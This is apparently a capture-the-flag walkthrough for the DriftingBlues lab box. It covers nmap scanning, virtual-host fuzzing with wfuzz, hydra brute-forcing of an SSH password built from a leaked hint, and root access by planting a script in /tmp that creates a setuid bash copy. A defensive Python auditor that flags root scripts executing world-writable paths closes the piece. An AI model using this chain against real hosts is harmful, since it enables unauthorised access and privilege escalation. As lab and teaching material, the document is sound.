Information gathering:
# Nmap 7.93 scan initiated Thu Jul 27 00:13:37 2023 as: nmap -sT -sC -sV -O -A -p22,80 -o nmap_details.txt 192.168.0.108
Nmap scan report for 192.168.0.108 (192.168.0.108)
Host is up (0.00064s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cae6d11f27f26298efbfe438b5f16777 (RSA)
| 256 a8589999f681c4c2b4da44da9bf3b89b (ECDSA)
|_ 256 395b552a79edc3bff516fdbd61292ab7 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Drifting Blues Tech
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:02:AA:91 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#curl -i -L http://192.168.0.108
The response contains an odd HTML comment:
<!-- L25vdGVmb3JraW5nZmlzaC50eHQ= -->
#echo 'L25vdGVmb3JraW5nZmlzaC50eHQ=' | base64 -d
/noteforkingfish.txt
#wget http://192.168.0.108//noteforkingfish.txt
The file contains a single string of encoded text.
Decoded with an online decoder, it reads: my man, i know you are new but you should know how to use host file to reach our secret location. -eric
In other words, the hosts file has to be edited so the site can be reached by domain name.
Edit /etc/hosts and add:
192.168.0.108 driftingblues.box
Brute-force virtual hosts (subdomains):
#wfuzz -H 'HOST:FUZZ.driftingblues.box' -u 'http://192.168.0.108' -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt
Most responses have a word count (hw) of 570, so filter those out with --hw 570:
wfuzz -H 'HOST:FUZZ.driftingblues.box' -u 'http://192.168.0.108' -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt --hw 570
This returns:
000000016: 200 5 L 4 W 24 Ch "test - test"
Edit the hosts file again:
192.168.0.108 driftingblues.box test.driftingblues.box
#dirb http://test.driftingblues.box
---- Scanning URL: http://test.driftingblues.box/ ----
+ http://test.driftingblues.box/index.html (CODE:200|SIZE:24)
+ http://test.driftingblues.box/robots.txt (CODE:200|SIZE:125)
+ http://test.driftingblues.box/server-status (CODE:403|SIZE:287)
The directory brute-force reveals robots.txt, which contains:
Disallow: /ssh_cred.txt
Allow: /never
Allow: /never/gonna
Allow: /never/gonna/give
Allow: /never/gonna/give/up
Visit /ssh_cred.txt.
Its contents:
we can use ssh password in case of emergency. it was "1mw4ckyyucky".
sheryl once told me that she added a number to the end of the password.
-db
Build a wordlist:
wordlist.dir:
1mw4ckyyucky1
1mw4ckyyucky2
1mw4ckyyucky3
1mw4ckyyucky4
1mw4ckyyucky5
1mw4ckyyucky6
1mw4ckyyucky7
1mw4ckyyucky8
1mw4ckyyucky9
1mw4ckyyucky0
# hydra -l eric -P wordlist.dir 192.168.0.108 ssh
[22][ssh] host: 192.168.0.108 login: eric password: 1mw4ckyyucky6
Valid credentials obtained.
Log in via ssh.
Running pspy64 reveals a scheduled task:
2023/07/27 08:06:01 CMD: UID=0 PID=2058 | /usr/bin/zip -r -0 /tmp/backup.zip /var/www/
2023/07/27 08:06:01 CMD: UID=0 PID=2057 | /bin/sh /var/backups/backup.sh
2023/07/27 08:06:01 CMD: UID=0 PID=2056 | /bin/sh -c /bin/sh /var/backups/backup.sh
2023/07/27 08:06:01 CMD: UID=0 PID=2055 | /usr/sbin/CRON -f
2023/07/27 08:06:01 CMD: UID=0 PID=2059 | /bin/sh /var/backups/backup.sh
2023/07/27 08:06:01 CMD: UID=0 PID=2060 | sudo /tmp/emergency
Contents of backup.sh:
#!/bin/bash
/usr/bin/zip -r -0 /tmp/backup.zip /var/www/
/bin/chmod
#having a backdoor would be nice
sudo /tmp/emergency
There is no emergency binary in /tmp.
Create an executable file in /tmp (shebang added so the script is runnable as written):
emergency:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod u+s /tmp/rootbash
After the cron job has run, escalate to root:
./rootbash -p
Root obtained.
rootbash-4.3# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
thank you for playing
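The cron job above runs backup.sh as root, and that script executes sudo /tmp/emergency, a path in a directory any local user can write to, so whoever creates the file chooses what root runs. As an added defender-side example (not part of the original writeup or the box), this Python script statically audits a shell script for command paths under world-writable directories; the backup.sh text is embedded as constructed sample input, and the heuristic is word-level only (pipes and variable expansion are not followed).

```python
from __future__ import annotations
import shlex
from dataclasses import dataclass

# Directories any local user can create files in. A root-run script that executes
# a path under one of them lets an unprivileged user decide what runs as root; this
# is the weakness in the backup.sh cron job above. (Example code, not from the box.)
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Words that hand control to whatever path follows them.
EXEC_WORDS = {"sudo", "sh", "bash", "source", ".", "exec", "nohup", "env"}

@dataclass
class Finding:
    line_no: int
    path: str
    severity: str   # "high": executed as a command; "low": merely referenced
    reason: str

def audit_script(text: str) -> list[Finding]:
    """Statically flag paths under world-writable directories in a shell script."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # comments and the shebang never execute
        try:
            words = shlex.split(line)
        except ValueError:
            words = line.split()  # unbalanced quotes: fall back to a crude split
        for i, word in enumerate(words):
            if not word.startswith(WORLD_WRITABLE):
                continue
            if i == 0:
                findings.append(Finding(line_no, word, "high", "executed directly"))
            elif words[i - 1] in EXEC_WORDS:
                findings.append(Finding(line_no, word, "high", f"executed via {words[i - 1]}"))
            else:
                findings.append(Finding(line_no, word, "low", "used as an argument (e.g. output written there)"))
    return findings
# Constructed copy of the backup.sh shown above, used here as sample input.
SAMPLE_BACKUP_SH = """#!/bin/bash
/usr/bin/zip -r -0 /tmp/backup.zip /var/www/
/bin/chmod
#having a backdoor would be nice
sudo /tmp/emergency
"""

if __name__ == "__main__":
    for f in audit_script(SAMPLE_BACKUP_SH):
        print(f"line {f.line_no} [{f.severity}] {f.path}: {f.reason}")
```

The low-severity hit on /tmp/backup.zip is worth a look too: a root-owned archive of /var/www dropped into /tmp is readable by every local user.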